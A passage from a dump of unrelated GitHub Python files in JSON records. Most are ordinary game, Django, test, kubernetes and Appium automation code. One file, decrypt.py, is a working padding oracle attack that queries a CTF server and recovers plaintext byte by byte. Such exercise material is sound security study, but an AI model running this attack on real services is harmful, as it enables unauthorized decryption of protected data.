{total}')\n","repo_name":"ThiagoAndrad/levelup-byte-card-python","sub_path":"teste_compra.py","file_name":"teste_compra.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"38158767674","text":"import pygame, random\nfrom PIL import Image\n\n\n# функция создания пазлов\ndef create_puzzles(num, width, height):\n rows = num\n cols = num\n num_cells = rows * cols\n\n cell_width = width // rows\n cell_height = height // cols\n\n cells = []\n rand_indexes = list(range(0, num_cells))\n\n for i in range(num_cells):\n x = (i % rows) * cell_width\n y = (i // cols) * cell_height\n rect = pygame.Rect(x, y, cell_width, cell_height)\n rand_pos = random.choice(rand_indexes)\n rand_indexes.remove(rand_pos)\n cells.append({'rect': rect, 'border': (255, 255, 255), 'order': i, 'pos': rand_pos})\n return [cells, cell_width, cell_height]\n\n\n# функция создания фона для финального экрана\ndef converting(image):\n im_final = image.convert(\"L\")\n im_final.save('final.jpg')\n bg_final = pygame.image.load('final.jpg')\n return bg_final\n\n\n# функция изменения громкости\ndef change_volume(flag, volume):\n if flag:\n if 0 <= volume < 10:\n volume += 1\n pygame.mixer.music.set_volume(0.1 * volume)\n return volume\n elif volume == 10:\n return volume\n else:\n if 0 < volume <= 10:\n volume -= 1\n pygame.mixer.music.set_volume(0.1 * volume)\n return volume\n elif volume == 0:\n return volume\n","repo_name":"Scut1er/Ultimate-puzzle","sub_path":"defs.py","file_name":"defs.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"31791274117","text":"import numpy as np\nimport pytest\nfrom matplotlib import pyplot as plt\nfrom matplotlib.axes import Axes\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import precision_recall_curve\nfrom sklearn.preprocessing import label_binarize\nfrom sklearn.svm import SVC\n\nfrom ml_tooling import Model\nfrom ml_tooling.data import load_demo_dataset\nfrom ml_tooling.result import Result\nfrom ml_tooling.utils import VizError\n\n\nclass TestPRCurve:\n @pytest.fixture(scope=\"class\")\n def classifier_result(self) -> Result:\n \"\"\"Setup a classiifer Result\"\"\"\n dataset = load_demo_dataset(\"iris\")\n model = Model(LogisticRegression())\n return model.score_estimator(dataset)\n\n @pytest.fixture(scope=\"class\")\n def ax(self, classifier_result: Result) -> Axes:\n \"\"\"Setup a PR Curve plot\"\"\"\n yield classifier_result.plot.precision_recall_curve()\n plt.close()\n\n def test_plots_can_be_given_an_ax(self, classifier_result: Result):\n \"\"\"Expect a plot to be able to be passed an existing axis and plot on that\"\"\"\n fig, ax = plt.subplots()\n test_ax = classifier_result.plot.precision_recall_curve(ax=ax)\n assert ax == test_ax\n plt.close()\n\n def test_has_the_correct_title(self, ax: Axes):\n \"\"\"Expect the title to reflect the estimator used\"\"\"\n assert ax.title.get_text() == \"Precision-Recall - LogisticRegression\"\n\n def test_has_the_correct_ylabel(self, ax: Axes):\n \"\"\"Expect the plot to have the correct y label\"\"\"\n assert ax.get_ylabel() == \"Precision\"\n\n def test_has_the_correct_xlabel(self, ax: Axes):\n \"\"\"Expect the plot to have the correct x label\"\"\"\n assert ax.get_xlabel() == \"Recall\"\n\n @pytest.mark.parametrize(\"class_index\", [0, 1, 2])\n def test_pr_curve_have_correct_data(\n self, ax: Axes, classifier_result: Result, class_index\n ):\n \"\"\"Expect the pr curve to have the correct data\"\"\"\n x = classifier_result.plot._data.test_x\n y_true = label_binarize(classifier_result.plot._data.test_y, classes=[0, 1, 2])[\n :, class_index\n ]\n y_proba = classifier_result.estimator.predict_proba(x)[:, class_index]\n\n precision, recall, _ = precision_recall_curve(y_true, y_proba)\n\n assert np.all(recall == ax.lines[class_index].get_xdata())\n assert np.all(precision == ax.lines[class_index].get_ydata())\n plt.close()\n\n def test_pr_curve_fails_correctly_without_predict_proba(self):\n \"\"\"\n Expect that the plot will raise an exception if the estimator\n does not have a predict_proba method\n \"\"\"\n dataset = load_demo_dataset(\"iris\")\n svc = Model(SVC(gamma=\"scale\"))\n result = svc.score_estimator(dataset)\n with pytest.raises(VizError):\n result.plot.precision_recall_curve()\n plt.close()\n\n def test_fails_if_wrong_number_of_labels_passed(self, classifier_result: Result):\n \"\"\"\n Expect the plot to raise if a different number of labels are passed, than there are\n classes in the data\n \"\"\"\n with pytest.raises(VizError):\n classifier_result.plot.precision_recall_curve(labels=[\"one\"])\n","repo_name":"andersbogsnes/ml_tooling","sub_path":"tests/test_visualizations/test_precision_recall_curve.py","file_name":"test_precision_recall_curve.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"}
+{"seq_id":"17763583101","text":"import socket\nimport time\n\nhost = \"192.168.2.83\"\n\nport = 26151\n\ninvalid = 'invalid padding\\n'\n\ndata = \"5468697320697320616e204956343536069242ad5ac3e289582b09ff2d30032b0e72a2004dc6d37181448f0327a2a3f3fe3280b99951c832ca8d08940716d226af1a2edddadfdbe92a5933f4d869c714e53842a369eb89a44ae1159b3b73f3d3\" ## the cipher we want to decrypt, copy from CTF server terminal\n\n\nblock1 = data[0:32]\nblock2 = data[32:64]\nblock3 = data[64:96]\nblock4 = data[96:128]\nblock5 = data[128:160]\nblock6 = data[160:192]\n\ndef attack_blocks(block1, block2):\n c1 = block1\n c2 = block2\n res = b\"\"\n index = 30\n plain_padding = 1\n Is = []\n for _ in range(16):\n time.sleep(5)\n paddings = [hex(plain_padding ^ I)[2:] for I in Is]\n padding_str = \"\"\n\n for I in Is:\n p = hex(plain_padding ^ I)[2:]\n if len(p) == 1:\n p = '0' + p\n padding_str += p\n\n for i in range(256):\n b = hex(i)[2:]\n if len(b) == 1:\n b = \"0\" + b\n\n c1_ = c1[ : index] + b + padding_str\n print(\"current cipher: \", c1_)\n secret_text = c1_ + c2 + \" \"\n\n s = socket.socket()\n s.connect((host, port))\n s.sendall(secret_text.encode())\n s.shutdown(socket.SHUT_WR)\n\n fragments = []\n while True:\n chunk = s.recv(100)\n if not chunk:\n break\n fragments.append(chunk.decode('utf-8'))\n result = \"\".join(fragments)\n \n s.close()\n\n if result[-16:] != invalid:\n if b == c1[index : index + 2] and plain_padding == 1:\n continue\n I = int(b, 16) ^ plain_padding ##\n Is = [I] + Is\n plain = hex(int(c1[index:index + 2], 16) ^ I)[2:] ##\n if len(plain) == 1:\n plain = '0' + plain\n bytes_obj = bytes.fromhex(plain)\n res = bytes_obj + res\n plain_padding += 1\n index -= 2\n break\n print(\"current block has message: \", res)\n return res\n\n\n\nplain_5 = attack_blocks(block5, block6)\ntime.sleep(5)\nplain_4 = attack_blocks(block4, block5)\ntime.sleep(5)\nplain_3 = attack_blocks(block3, block4)\ntime.sleep(5)\nplain_2 = attack_blocks(block2, block3)\ntime.sleep(5)\nplain_1 = attack_blocks(block1, block2)\n\nprint(\"The plain text is \", plain_1 + plain_2 + plain_3 + plain_4 + plain_5)\n","repo_name":"biankaiwen111/padding_oracles","sub_path":"decrypt.py","file_name":"decrypt.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"18229130641","text":"from typing import List\nimport itertools\n\n\nclass Solution:\n def letterCombinations(self, digits: str) -> List[str]:\n\n if not digits:\n return None\n\n phone = {'2': ['a', 'b', 'c'],\n '3': ['d', 'e', 'f'],\n '4': ['g', 'h', 'i'],\n '5': ['j', 'k', 'l'],\n '6': ['m', 'n', 'o'],\n '7': ['p', 'q', 'r', 's'],\n '8': ['t', 'u', 'v'],\n '9': ['w', 'x', 'y', 'z']}\n\n\n def divideAndConquer(number):\n\n count_of_digits = len(number)\n\n mid = int(count_of_digits/2)\n\n if mid == 0:\n return phone.get(number[0])\n\n list1 = divideAndConquer(number[0:mid])\n list2 = divideAndConquer(number[mid:])\n\n combo = [''.join(tuple) for tuple in (list(itertools.product(list1,list2)))]\n return combo\n\n return divideAndConquer(digits)\n\n\ndigits = '243'\ns = Solution()\nprint(s.letterCombinations(digits))\n","repo_name":"jayati-naik/Leetcode-Recursion-II","sub_path":"LetterCombinationsD&C.py","file_name":"LetterCombinationsD&C.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"13105584486","text":"from django.conf import settings\nfrom django.shortcuts import render\n\nfrom .forms import RegModelForm, ContactForm\nfrom .models import Registrado\n\n# Create your views here.\ndef home(request):\n titulo = \"Welcome!\"\n if request.user.is_authenticated:\n titulo = \"Welcome %s\" %(request.user)\n form = RegModelForm(request.POST or None)\n \n context = {\n \"titulo\": titulo,\n \"form\": form,\n }\n \n if form.is_valid():\n instance = form.save(commit=False)\n nombre = form.cleaned_data.get(\"nombre\")\n email = form.cleaned_data.get(\"email\")\n if not instance.nombre:\n instance.nombre = \"PERSONA\"\n instance.save()\n \n context = {\n \"titulo\": \"Gracias %s!\" %(nombre)\n }\n\n if not nombre:\n context = {\n \"titulo\": \"Gracias %s!\" %(email)\n }\n\n print (instance)\n print (instance.timestamp)\n\n if request.user.is_authenticated and request.user.is_staff:\n queryset = Registrado.objects.all().order_by('-timestamp') \n context = {\n \"queryset\": queryset,\n }\n return render(request, \"home.html\", context)\n\ndef contact(request):\n titulo = \"Contacto\"\n form = ContactForm(request.POST or None)\n if form.is_valid():\n for key in form.cleaned_data:\n print (key)\n print (form.cleaned_data.get(key))\n\n context = {\n \"form\": form,\n \"titulo\": \"Contacto\",\n }\n return render(request, \"forms.html\", context)","repo_name":"lnpereyra/djangofirstapp","sub_path":"src/boletin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"13141286226","text":"from django.db import models\n\n# Create your models here.\n\nclass Author(models.Model):\n name = models.CharField('Имя автора', max_length= 250)\n surname = models.CharField('Фамилия автора', max_length=250)\n\n def __str__(self):\n return self.name\n\nclass Book(models.Model):\n author = models.ForeignKey(Author)\n book_name = models.CharField('Название книги', max_length=250)\n release_date = models.DateField('Дата выпуска', )\n\n def __str__(self):\n return self.book_name\n\nclass Comment(models.Model):\n comments_link_user = models.ForeignKey('User')\n comments_link_author = models.ForeignKey(Author, blank= True,null=True)\n comments_link_book = models.ForeignKey(Book, blank=True, null=True)\n comment_text = models.TextField('текст комментария', max_length=250)\n\nclass User (models.Model):\n name = models.CharField('Имя автора', max_length=250)\n surname = models.CharField('фамилия автора', max_length=250)\n\n\n","repo_name":"sergeyrudov/library","sub_path":"Books/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"20814575783","text":"from app.domain import List, Item\nfrom app.infrastructure.repositories import ListRepository\nfrom app.error import Error\nfrom result import Ok, Result\n\n\nclass List:\n def __init__(self):\n self.list_repository = ListRepository()\n\n def find(self, list_id: str) -> Result[List, Error]:\n list_result = self.list_repository.find_by_id(list_id)\n return list_result\n\n def create_item(\n self,\n text: str,\n list_id: str,\n ) -> Result[Item, Error]:\n # find the existing list\n list_result = self.list_repository.find_by_id(list_id)\n\n # if list was not found, return error\n if list_result.is_err():\n return list_result\n\n # pull out the list domain object\n list = list_result.ok()\n\n # create the new item\n item = Item(text=text)\n\n # add the item to the list\n list.add_item(item)\n\n # save the aggregate\n save_result = self.list_repository.save(list)\n\n if save_result.is_err():\n return save_result\n\n return Ok(item)\n","repo_name":"MathyouMB/django-ddd-service-template","sub_path":"app/application/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"13128376856","text":"import tkinter as tk\r\nfrom PIL import Image, ImageTk, EpsImagePlugin\r\nimport pyautogui\r\nfrom app.cv import processing\r\n\r\nclass Drawing(tk.Tk):\r\n def __init__(self):\r\n tk.Tk.__init__(self)\r\n self.x = self.y = 0\r\n self.canvas = tk.Canvas(self, width=1920, height=1080, cursor=\"cross\")\r\n self.canvas.pack(side=\"top\", fill=\"both\", expand=True)\r\n self.canvas.bind(\"\", self.on_button_press)\r\n self.canvas.bind(\"\", self.on_button3_press)\r\n self.canvas.bind(\"\", self.on_move)\r\n\r\n self.line = None\r\n\r\n self.start_x = None\r\n self.start_y = None\r\n\r\n self.old_x = None\r\n self.old_y = None\r\n\r\n self.first_x = None\r\n self.first_y = None\r\n\r\n self._draw_image()\r\n\r\n def _draw_image(self):\r\n self.im = Image.open('screenshot.jpg')\r\n self.tk_im = ImageTk.PhotoImage(self.im)\r\n self.canvas.create_image(0, 0, anchor=\"nw\", image=self.tk_im)\r\n\r\n def on_button_press(self, event):\r\n self.old_x = self.start_x\r\n self.old_y = self.start_y\r\n self.start_x = event.x\r\n self.start_y = event.y\r\n if self.old_x is not None:\r\n if abs(event.x - self.first_x) <= 10 and abs(event.y - self.first_y) <= 10:\r\n self.canvas.create_line(self.old_x, self.old_y, self.first_x, self.first_y, fill='red', tag=\"lines\")\r\n self.line = None\r\n self.start_x = None\r\n self.start_y = None\r\n self.old_x = None\r\n self.old_y = None\r\n self.first_x = None\r\n self.first_y = None\r\n img = Image.open('screenshot.jpg')\r\n EpsImagePlugin.gs_windows_binary = r'C:\\Program Files\\gs\\gs9.56.1\\bin\\gswin64c'\r\n self.canvas.postscript(file='polygon' + '.eps')\r\n img = Image.open('polygon' + '.eps')\r\n img.save('polygon' + '.png', 'png')\r\n img = Image.open('polygon' + '.png')\r\n processing(img)\r\n else:\r\n self.canvas.create_line(self.old_x, self.old_y, event.x, event.y, fill='red', tag=\"lines\")\r\n\r\n else:\r\n self.first_x = self.start_x\r\n self.first_y = self.start_y\r\n\r\n if not self.line:\r\n self.line = self.canvas.create_line(self.start_x, self.start_y, event.x, event.y, fill='red', tag=\"lines\")\r\n\r\n def on_move(self, event):\r\n curX, curY = (event.x, event.y)\r\n\r\n # expand rectangle as you drag the mouse\r\n if self.start_x is not None:\r\n self.canvas.coords(self.line, self.start_x, self.start_y, curX, curY)\r\n\r\n def on_button3_press(self, event):\r\n self.canvas.delete('lines')\r\n self.line = None\r\n self.start_x = None\r\n self.start_y = None\r\n self.old_x = None\r\n self.old_y = None\r\n self.first_x = None\r\n self.first_y = None\r\n\r\n\r\ndef main():\r\n pyautogui.screenshot('screenshot.jpg', region=(0, 0, 1920, 1080))\r\n draw = Drawing()\r\n draw.mainloop()\r\n","repo_name":"NovakWilson/projectt","sub_path":"drawing.py","file_name":"drawing.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"14868206940","text":"import pytest\nfrom api import Restful\n\nhost = 'http://localhost:32768'\n\n\ndef create_new(type_b, name, age):\n parametrs = [type_b, name.upper(), age]\n list_r = ['None', 'None', 'None', 'None']\n\n # format param\n param_dict = Parametrs_bear().param(type_b, name, age)\n\n # create new\n res = Restful(host).create_new_bear(param_dict)\n res_stat = res.status_code\n\n list_r[3] = str(res_stat)\n if res_stat != 500:\n created_id = int(res.content)\n print('id new objeckt: ', created_id,'the collected parameters: ', param_dict, \\\n 'status_code: ',res_stat)\n\n # check type created obj\n res = Restful(host).read_bear(created_id)\n l_p = [\"bear_type\", \"bear_name\", \"bear_age\"]\n for i in range(3):\n if res.json() != None:\n par = res.json()[l_p[i]]\n else:\n par = 'None'\n list_r[i] = par\n print('parametr_ecxpect: ', parametrs[i], ' << == >> parametr_fuct:', par)\n\n print('parametrs fron testing objekt :',list_r)\n return list_r\n\n\ndef create_one():\n param_dict = Parametrs_bear().param('POLAR', 'mihail', 17.5)\n # create new\n res = Restful(host).create_new_bear(param_dict)\n return int(res.content)\n\n\ndef update(type_b, name, age, created_id):\n parametrs = [type_b, name.upper(), age]\n list_r = ['None', 'None', 'None', 'None']\n\n # format param\n param_dict = Parametrs_bear().param(type_b, name, age)\n\n # update param\n res = Restful(host).update_bear(created_id, param_dict)\n list_r[3] = str(res.status_code)\n\n # check update\n res = Restful(host).read_bear(created_id)\n l_p = [\"bear_type\", \"bear_name\", \"bear_age\"]\n for i in range(3):\n if res.json() != None:\n par = res.json()[l_p[i]]\n else:\n par = 'None'\n list_r[i] = par\n print('parametr_ecxpect: ', parametrs[i], ' << == >> parametr_fuct:', par)\n\n print('parametrs fron testing objekt :', list_r)\n return list_r\n\n\ndef test_dellete_one():\n param = Parametrs_bear().param('POLAR', 'mihail', 17.5)\n # create new\n res = Restful(host).create_new_bear(param)\n created_id = int(res.content)\n print('created_id :', created_id, ' ', param, ' ', res.status_code)\n # dell by id\n Restful(host).dell_bear(created_id)\n # check odj by id dellete\n res = Restful(host).read_bear(created_id)\n assert res.content == b'EMPTY'\n\n\nclass Parametrs_bear:\n def param(self, type_b, name, age):\n param_dict = {\"bear_type\": type_b, \"bear_name\": name, \"bear_age\": age}\n return param_dict\n\n\n@pytest.mark.parametrize(\"type_b , name, age, res\",\n [\n ('POLAR', 'mihail', 17.5, '200'),\n ('BROWN', 'mihail', 17.5, '200'),\n ('BLACK', 'mihail', 17.5, '200'),\n ('GUMMY', 'mihail', 17.5, '200'),\n ('', 'mihail', 17.5, '500'),\n ('BROWN', '', 17.5, '500'),\n ('BLACK', 'mihail', '', '500'),\n ('BLACK', 'mihail', 0, '200'),\n ('black', 'mihail', 10, '500'),\n ('white', 'mihail', 10, '500'),\n (0, 'mihail', 10, '500'),\n ('BLACK', 'm' * 100, 10, '200'),\n ('BLACK', 'm' * 1000, 10, '200'),\n ('BLACK', 'mihail', -0.1, '200'),\n ('BLACK', 'mihail', 200, '500'),\n\n ]\n )\ndef test_create(type_b, name, age, res):\n l_res = create_new(type_b, name, age)\n n_res = l_res[3]\n if age != '' and age < 0:\n age = 0\n\n assert res in n_res\n if n_res != '500':\n assert type_b in l_res[0]\n assert name.upper() in l_res[1]\n assert age == l_res[2]\n\n\n@pytest.mark.parametrize(\"type_b , name, age, res\",\n [\n ('BROWN', 'mihail', 17.5, '200'),\n ('POLAR', 'Change_Name', 17.5, '200'),\n ('POLAR', 'mihail', 10, '200'),\n ]\n )\ndef test_update(type_b, name, age, res):\n l_res = update(type_b, name, age, 
create_one())\n n_res = l_res[3]\n\n assert res in n_res\n if n_res != '500':\n assert type_b in l_res[0]\n assert name in l_res[1]\n assert age == l_res[2]\n\n\ndef test_dellete_all():\n # clear base\n Restful(host).dell_all_bear()\n # check base == []\n res = Restful(host).read_all_bears().json()\n assert res == []\n","repo_name":"Polenichko/Alaska_bears","sub_path":"tests_script.py","file_name":"tests_script.py","file_ext":"py","file_size_in_byte":4712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"23775447961","text":"import kubernetes\n\n\nif __name__ == \"__main__\":\n kubernetes.config.load_kube_config()\n api = kubernetes.client.CoreV1Api()\n # a = api.read_namespace('default')\n # print(a.metadata.name)\n custom_obj_api = kubernetes.client.CustomObjectsApi()\n\n tenants = custom_obj_api.list_cluster_custom_object('ip.demo.com', 'v1', 'tenants')\n print(tenants['items'])\n # old = ['user1@demo.com', 'user2@demo.com']\n # new = ['user1@demo.com', 'user3@demo.com']\n\n # print(f\"new: {set(new) - set(old)}\")\n \n # print(f\"removed: {set(old) - set(new)}\")","repo_name":"JasperJiang/KubernetesCRDPlay","sub_path":"kubectl.py","file_name":"kubectl.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"6069553232","text":"from selenium import webdriver\nfrom selenium.common.exceptions import ElementClickInterceptedException\nfrom appium.webdriver.common.touch_action import TouchAction\nfrom time import sleep\nimport re\n\nfrom sweet import log, vars\nfrom sweet.utility import compare, replace, json2dict\n\nfrom sweet.modules.mobile.window import Windows\nfrom sweet.modules.web.locator import locating\nfrom sweet.modules.web.config import *\n\n\nclass App:\n\n keywords = keywords\n\n def __init__(self, setting):\n self.action = {}\n platform = setting.get('platformName', '')\n # snapshot = setting.pop('snapshot', False)\n\n if platform.lower() == 'ios':\n from appium import webdriver as appdriver\n self.driver = appdriver.Remote(self.server_url, self.desired_caps)\n\n elif platform.lower() == 'android':\n from appium import webdriver as appdriver\n self.driver = appdriver.Remote(self.server_url, self.desired_caps)\n\n # 等待元素超时时间\n self.driver.implicitly_wait(element_wait_timeout) # seconds\n # 页面刷新超时时间\n self.driver.set_page_load_timeout(page_flash_timeout) # seconds\n self.w = Windows()\n self.w.driver = self.driver\n\n def _close(self):\n pass\n\n def _call(self, step):\n # 处理截图数据\n # snap = Snapshot()\n # snap.pre(step)\n\n context = replace(step.get('frame', '')).strip()\n self.w.switch_context(context)\n\n if self.w.current_context.startswith('WEBVIEW'):\n # 切换标签页\n tab = step['data'].get('#tab')\n if tab:\n del step['data']['#tab']\n self.driver.switch_to_window(self.w.windows[tab])\n log.debug(f'current context: {repr(self.w.current_context)}')\n\n # 根据关键字调用关键字实现\n element = getattr(self, step['keyword'].lower())(step)\n # snap.web_shot(step, element)\n\n\n def title(self, data, output):\n log.debug(f'DATA:{repr(data[\"text\"])}')\n log.debug(f'REAL:{repr(self.driver.title)}')\n\n if data['text'].startswith('*'):\n assert data['text'][1:] in self.driver.title\n else:\n assert data['text'] == self.driver.title\n # 只能获取到元素标题\n for key in output:\n vars.put({key: self.driver.title})\n\n\n def current_url(self, data, output):\n log.debug(f'DATA:{repr(data[\"text\"])}')\n log.debug(f'REAL:{repr(self.driver.current_url)}')\n try:\n if data['text'].startswith('*'):\n assert data['text'][1:] in self.driver.current_url\n else:\n assert data['text'] == self.driver.current_url\n except:\n raise Exception(\n f'check failure, DATA:{data[\"text\"]}, REAL:{self.driver.current_url}')\n # 只能获取到元素 url\n for key in output:\n vars.put({key: self.driver.current_url})\n return self.driver.current_url\n\n def locat(self, element, action=''):\n if not isinstance(element, dict):\n raise Exception(f'no this element:{element}')\n\n\n def open(self, step):\n url = step['element']['value']\n\n if step['data'].get('#clear', ''):\n self.driver.delete_all_cookies()\n\n self.driver.get(url)\n\n cookie = step['data'].get('cookie', '')\n if cookie:\n self.driver.add_cookie(json2dict(cookie))\n co = self.driver.get_cookie(json2dict(cookie).get('name', ''))\n log.debug(f'cookie is add: {co}')\n sleep(0.5)\n\n\n def check(self, step):\n data = step['data']\n if not data:\n data = step['expected']\n\n element = step['element']\n by = element['by']\n output = step['output']\n\n if by in ('title', 'current_url'):\n getattr(self, by)(data, output)\n else:\n location = self.locat(element)\n for key in data:\n # 预期结果\n expected = data[key]\n # 切片操作处理\n s = re.findall(r'\\[.*?\\]', key)\n if s:\n s = s[0]\n key = key.replace(s, '')\n\n if key == 'text':\n real = location.text\n else:\n real = 
location.get_attribute(key)\n if s:\n real = eval('real' + s)\n\n log.debug(f'DATA:{repr(expected)}')\n log.debug(f'REAL:{repr(real)}')\n try:\n compare(expected, real)\n except:\n raise Exception(\n f'check failure, DATA:{repr(expected)}, REAL:{repr(real)}')\n\n # 获取元素其他属性\n for key in output:\n if output[key] == 'text':\n v = location.text\n vars.put({key: v})\n elif output[key] in ('text…', 'text...'):\n if location.text.endswith('...'):\n v = location.text[:-3]\n vars.put({key: v})\n else:\n v = location.text\n vars.put({key: v})\n else:\n v = location.get_attribute(output[key])\n vars.put({key: v})\n\n\n def notcheck(self, step):\n try:\n self.check(step)\n raise Exception('check is success')\n except:\n pass\n\n def input(self, step):\n data = step['data']\n location = self.locat(step['element'])\n\n if step['data'].get('清除文本', '') == '否' or step['data'].get('clear', '').lower() == 'no':\n pass\n else:\n location.clear()\n\n for key in data:\n if key.startswith('text'):\n if isinstance(data[key], tuple):\n location.send_keys(*data[key])\n elif location:\n location.send_keys(data[key])\n sleep(0.5)\n if key == 'word': # 逐字输入\n for d in data[key]:\n location.send_keys(d)\n sleep(0.3)\n\n def set_value(self, step):\n data = step['data']\n location = self.locat(step['element'])\n if step['data'].get('清除文本', '') == '否' or step['data'].get('clear', '').lower() == 'no':\n pass\n else:\n location.clear()\n\n for key in data:\n if key.startswith('text'):\n if isinstance(data[key], tuple):\n location.set_value(*data[key])\n elif location:\n location.set_value(data[key])\n sleep(0.5)\n if key == 'word': # 逐字输入\n for d in data[key]:\n location.set_value(d)\n sleep(0.3)\n\n def click(self, step):\n elements = step['elements'] # click 支持多个元素连续操作,需要转换为 list\n # data = step['data']\n\n location = ''\n for element in elements:\n location = self.locat(element, 'CLICK')\n sleep(0.5)\n try:\n location.click()\n except ElementClickInterceptedException: # 如果元素为不可点击状态,则等待1秒,再重试一次\n sleep(1)\n location.click()\n sleep(0.5)\n\n # 获取元素其他属性\n output = step['output']\n for key in output:\n if output[key] == 'text':\n vars.put({key: location.text})\n elif output[key] == 'tag_name':\n vars.put({key: location.tag_name})\n elif output[key] in ('text…', 'text...'):\n if location.text.endswith('...'):\n vars.put({key: location.text[:-3]})\n else:\n vars.put({key: location.text})\n else:\n vars.put({key: location.get_attribute(output[key])})\n\n def tap(self, step):\n action = TouchAction(self.driver)\n\n elements = step['elements'] # click 支持多个元素连续操作,需要转换为 list\n # data = step['data']\n\n location = ''\n\n for element in elements:\n if ',' in element:\n position = element.split(',')\n x = int(position[0])\n y = int(position[1])\n position = (x, y)\n self.driver.tap([position])\n sleep(0.5)\n else:\n location = self.locat(element, 'CLICK')\n action.tap(location).perform()\n sleep(0.5)\n\n # 获取元素其他属性\n output = step['output']\n for key in output:\n if output[key] == 'text':\n vars.put({key: location.text})\n elif output[key] == 'tag_name':\n vars.put({key: location.tag_name}) \n elif output[key] in ('text…', 'text...'):\n if location.text.endswith('...'):\n vars.put({key: location.text[:-3]})\n else:\n vars.put({key: location.text})\n else:\n vars.put({key: location.get_attribute(output[key])})\n\n def press_keycode(self, step):\n element = step['element']\n self.driver.press_keycode(int(element))\n\n def swipe(self, step):\n elements = step['elements']\n duration = step['data'].get('持续时间', 0.3)\n assert 
isinstance(elements, list) and len(\n elements) == 2, '坐标格式或数量不对,正确格式如:100,200|300,400'\n\n start = elements[0].replace(',', ',').split(',')\n start_x = int(start[0])\n start_y = int(start[1])\n\n end = elements[1].replace(',', ',').split(',')\n end_x = int(end[0])\n end_y = int(end[1])\n\n if duration:\n self.driver.swipe(start_x, start_y, end_x,\n end_y, sleep(float(duration)))\n else:\n self.driver.swipe(start_x, start_y, end_x, end_y)\n\n def line(self, step):\n elements = step['elements']\n duration = float(step['data'].get('持续时间', 0.3))\n assert isinstance(elements, list) and len(\n elements) > 1, '坐标格式或数量不对,正确格式如:258,756|540,1032'\n postions = []\n for element in elements:\n element = element.replace(',', ',')\n p = element.split(',')\n postions.append(p)\n\n action = TouchAction(self.driver)\n action = action.press(\n x=postions[0][0], y=postions[0][1]).wait(duration * 1000)\n for i in range(1, len(postions)):\n action.move_to(x=postions[i][0], y=postions[i]\n [1]).wait(duration * 1000)\n action.release().perform()\n\n def line_unlock(self, step):\n elements = step['elements']\n duration = float(step['data'].get('持续时间', 0.3))\n assert isinstance(elements, list) and len(\n elements) > 2, '坐标格式或数量不对,正确格式如:lock_pattern|1|4|7|8|9'\n location = self.locat(elements[0]) \n rect = location.rect\n w = rect['width'] / 6\n h = rect['height'] / 6\n\n key = {}\n key['1'] = (rect['x'] + 1 * w, rect['y'] + 1 * h)\n key['2'] = (rect['x'] + 3 * w, rect['y'] + 1 * h)\n key['3'] = (rect['x'] + 5 * w, rect['y'] + 1 * h)\n key['4'] = (rect['x'] + 1 * w, rect['y'] + 3 * h)\n key['5'] = (rect['x'] + 3 * w, rect['y'] + 3 * h)\n key['6'] = (rect['x'] + 5 * w, rect['y'] + 3 * h)\n key['7'] = (rect['x'] + 1 * w, rect['y'] + 5 * h)\n key['8'] = (rect['x'] + 3 * w, rect['y'] + 5 * h)\n key['9'] = (rect['x'] + 5 * w, rect['y'] + 5 * h)\n\n action = TouchAction(self.driver)\n for i in range(1, len(elements)):\n k = elements[i]\n if i == 1:\n action = action.press(\n x=key[k][0], y=key[k][1]).wait(duration * 1000)\n action.move_to(x=key[k][0], y=key[k][1]).wait(duration * 1000)\n action.release().perform()\n\n def rocker(self, step):\n elements = step['elements']\n duration = float(step['data'].get('持续时间', 0.3))\n rocker_name = step['data'].get('摇杆', 'rocker')\n release = step['data'].get('释放', False)\n\n # if isinstance(element, str):\n # if element:\n # element = [element]\n # else:\n # element = []\n\n postions = []\n for element in elements:\n element = element.replace(',', ',')\n p = element.split(',')\n postions.append(p)\n\n # 如果 action 中么有此摇杆名,则是新的遥感\n if not self.action.get(rocker_name):\n self.action[rocker_name] = TouchAction(self.driver)\n self.action[rocker_name].press(\n x=postions[0][0], y=postions[0][1]).wait(duration * 1000)\n # 新摇杆的第一个点已操作,需要删除\n postions.pop(0)\n # 依次操作\n for i in range(len(postions)):\n self.action[rocker_name].move_to(\n x=postions[i][0], y=postions[i][1]).wait(duration * 1000)\n\n if release:\n # 释放摇杆,并删除摇杆\n self.action[rocker_name].release().perform()\n del self.action[rocker_name]\n else:\n self.action[rocker_name].perform()\n\n def scroll(self, step):\n elements = step['elements']\n assert isinstance(elements, list) and len(\n elements) == 2, '元素格��或数量不对,正确格式如:origin_el|destination_el'\n origin = self.locat(elements[0])\n destination = self.locat(elements[1])\n self.driver.scroll(origin, destination)\n\n def flick_element(self, step):\n elements = step['elements']\n speed = step['data'].get('持续时间', 10)\n assert isinstance(elements, list) and len(\n elements) == 2, 
